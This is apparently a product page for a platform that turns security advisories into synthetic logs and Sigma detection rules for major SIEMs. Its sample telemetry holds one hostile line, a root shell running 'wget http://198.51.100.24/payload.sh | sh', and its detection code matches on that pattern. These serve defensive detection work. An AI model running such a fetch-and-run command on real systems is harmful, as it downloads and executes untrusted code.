How It Works

The pipeline from sparse research to validated detection.

The workflow is built for the gap between a new advisory appearing and a security team having enough evidence to respond with confidence. It turns early research into synthetic logs, candidate detections, and validation context that teams can review before operational handoff.

A visible reasoning chain from source material to final query.

The pipeline does not hide the workflow behind a single generation step. It resolves the chain in order: source intake, synthetic telemetry, structured detection reasoning, and the final reviewable artifact.

Step 01 · Source grounded

Threat Research Intake

Ingest a vendor advisory, exploit write-up, or analyst notes and anchor the workflow around the behavior that matters now.

source.url = https://vendor.example/advisories/CVE-2026-1042
target.behavior = command injection over management plane
objective = produce reviewable early-stage coverage
Step 02 · Telemetry simulated

Synthetic Logs Generation

Model the attacker sequence and emit replayable telemetry so detection teams can reason about observables before field logs are mature.

{"ts":"2026-03-21T09:14:26Z","service":"cwmp","action":"Download","device":"openwrt-ap01"}
{"ts":"2026-03-21T09:14:27Z","proc":"sh","argv":"wget http://198.51.100.24/payload.sh | sh","uid":0}
{"ts":"2026-03-21T09:14:29Z","net.dst":"198.51.100.24","proto":"http","bytes_out":1842}
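The replayable telemetry above can be reasoned about directly in code. A minimal sketch, using the sample events and field names shown here (`proc`, `argv`, `uid`); the matching predicate is illustrative, not the platform's actual inference logic:

```python
import json

# The three synthetic JSONL events emitted in the sample above.
events = [
    '{"ts":"2026-03-21T09:14:26Z","service":"cwmp","action":"Download","device":"openwrt-ap01"}',
    '{"ts":"2026-03-21T09:14:27Z","proc":"sh","argv":"wget http://198.51.100.24/payload.sh | sh","uid":0}',
    '{"ts":"2026-03-21T09:14:29Z","net.dst":"198.51.100.24","proto":"http","bytes_out":1842}',
]

def suspicious(event: dict) -> bool:
    """Flag root-level shell activity that retrieves a remote payload.

    This predicate is a hand-written illustration of the observable an
    analyst would look for, not the product's detection inference.
    """
    return (
        event.get("uid") == 0
        and event.get("proc") in {"sh", "bash"}
        and "wget http://" in event.get("argv", "")
    )

hits = [e for e in map(json.loads, events) if suspicious(e)]
print(len(hits))  # → 1: only the shell-spawn event trips the predicate
```

Working against replayable events like this is what lets a team iterate on candidate observables before field logs exist.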
Step 03 · Signals inferred

Product Detection Inference

Map generated behavior into structured findings, candidate signals, and deployment-ready detection reasoning without treating the output as a black box.

Signal: CWMP Download parameter spawns shell execution
Confidence: root-level execution with remote retrieval behavior
Fields: process.command_line, device.product, network.destination.ip
Step 04 · Artifact ready

Final Detection Output

Deliver a clean final artifact the team can review, tune, and move into Splunk, Sentinel, or an internal detection library.

title: OpenWRT CWMP Download Command Injection
logsource:
  product: openwrt
detection:
  selection:
    process.command_line|contains: "wget http://"
  condition: selection
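Before handoff, the final rule's selection can be checked against the step 02 telemetry. A sketch under two stated assumptions: the hand-rolled matcher stands in for a real Sigma engine (production pipelines would use a Sigma toolchain such as pySigma), and the Sigma field `process.command_line` is mapped onto the sample telemetry's `argv` field:

```python
import json

# Selection from the rule above, as (Sigma field, required substring) pairs.
selection = {"process.command_line": "wget http://"}

# Assumed mapping from Sigma field names onto the synthetic telemetry's
# field names; real deployments resolve this via field mapping configs.
FIELD_MAP = {"process.command_line": "argv"}

def matches(event: dict) -> bool:
    """Return True if every selection pair is satisfied by the event."""
    return all(
        needle in str(event.get(FIELD_MAP.get(field, field), ""))
        for field, needle in selection.items()
    )

event = json.loads(
    '{"ts":"2026-03-21T09:14:27Z","proc":"sh",'
    '"argv":"wget http://198.51.100.24/payload.sh | sh","uid":0}'
)
print(matches(event))  # → True: the replayed event trips the selection
```

Running the candidate rule over the same synthetic events that motivated it is the quickest sanity check a reviewer can do before tuning the artifact for production.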

What enters the platform, what the core returns, and what the operating layer adds.

What goes in

  • Public advisory URL or full write-up
  • Pasted threat research or intelligence notes
  • Observed telemetry samples or raw event sets
  • Existing detection query for validation

What the core produces

  • Grounded attack-model context
  • Synthetic JSONL telemetry
  • Sigma rules and compiled backend queries
  • Validation and quality-scoring artifacts

What the backend adds

  • Runs, saved detections, and revisions
  • Comments, review states, and collaboration
  • PDF reports, exports, and share links
  • Organizations, billing, roles, and admin governance

Choose the workflow that matches the evidence your team has today.

Four distinct workflow types are already supported. That matters because not every team starts from the same level of evidence, urgency, or operational maturity.

Article to detection

Paste an advisory or write-up when a zero-day is new and field telemetry is still limited. The workflow turns that source into synthetic logs and candidate detections for early coverage.

Source to synthetic logs

Use the core when the main need is replayable telemetry. This is useful when teams want something concrete to reason about before strong production detections exist.

Logs to detection

Start from supplied telemetry when the environment already has evidence. It can then generate detections grounded in what was actually observed.

Query validation

Bring an existing detection query and measure how well it covers the behavior you care about. This is the right path when the team already has content but needs faster validation.

What the platform strengthens, and what it does not replace.

Not a SIEM replacement

It helps teams create and validate detection content faster. The output is meant to feed the SIEM, detection platform, or internal library the team already uses.

Not blind automation

The strongest use case is faster first-pass coverage with analyst review, not automatic promotion of every generated artifact into production.

Built for incomplete early-stage conditions

The product is especially useful when a new vulnerability appears and defenders only have an advisory or early write-up. That is where synthetic logs and candidate detections are most valuable.

Detection queries compiled for every major SIEM platform

Sigma rules are the canonical source of truth. Every backend query compiles directly from the same portable rule.
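The "one rule, many backends" idea can be sketched in a few lines. The output templates below are simplified illustrations of what two dialects look like for the same condition; they are not the platform's actual compiler output, which a real pipeline would produce with a Sigma toolchain such as pySigma:

```python
# One portable condition from the canonical rule: a substring match on a field.
rule = {
    "field": "process.command_line",
    "op": "contains",
    "value": "wget http://",
}

def to_spl(r: dict) -> str:
    # Splunk SPL sketch: wildcard field-value match.
    return f'search {r["field"]}="*{r["value"]}*"'

def to_kql(r: dict) -> str:
    # Microsoft Sentinel KQL sketch: contains operator on an assumed table.
    return f'DeviceProcessEvents | where {r["field"]} contains "{r["value"]}"'

print(to_spl(rule))
print(to_kql(rule))
```

The design point is that the rule dictionary never changes; only the per-backend emitter does, which is why the Sigma rule can stay the single source of truth across every platform listed below.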

Splunk

SPL

Search Processing Language queries with field-value pairs and pipeline operators for Splunk SIEM.

Microsoft Sentinel

KQL

Kusto Query Language for Microsoft Sentinel, with table joins and time-series filtering.

Elastic

EQL / KQL / ES|QL

Three Elastic query formats: EQL for event sequences, KQL for keyword filtering, and ES|QL for analytics.

Google SecOps

YARA-L 2.0

YARA-L rules for Google Security Operations Chronicle, structured around entity and event matching.

Palo Alto Cortex XDR

XQL

XDR Query Language for Palo Alto Cortex, with dataset selectors and behavioral correlation.

CrowdStrike

LogScale CQL

Falcon LogScale Composite Query Language for CrowdStrike, optimized for streaming log ingestion.

Sumo Logic

Search Query

Sumo Logic structured search queries with keyword and field-based log filtering.

IBM QRadar

AQL

Ariel Query Language for IBM QRadar SIEM, SQL-style with event and flow database access.

Research foundation

Every stage decision traces back to a published finding.

The pipeline was built by translating seven peer-reviewed papers directly into production engineering decisions. From how attack steps are structured to how detection conditions are filtered, every algorithmic choice has a measurable improvement behind it.

Read the research foundation